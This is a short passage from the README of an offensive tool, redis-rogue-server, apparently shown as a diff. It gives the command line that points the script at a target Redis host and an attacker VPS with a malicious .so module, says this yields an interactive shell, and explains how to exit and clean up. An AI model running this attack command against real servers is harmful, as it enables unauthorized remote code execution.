we08guyy/redis-rogue-server/README.md

 python3 redis-rogue-server.py --rhost <target address> [--rport <target port>] --lhost <vps address> [--lport <vps port>] [--so <.so filename>] [--rpasswd <redis auth>]
 ```

 Finally, you will get a interactive shell.
+Use `exit` to quit and clean rhost server or use `ctrl-C` to quit without clean.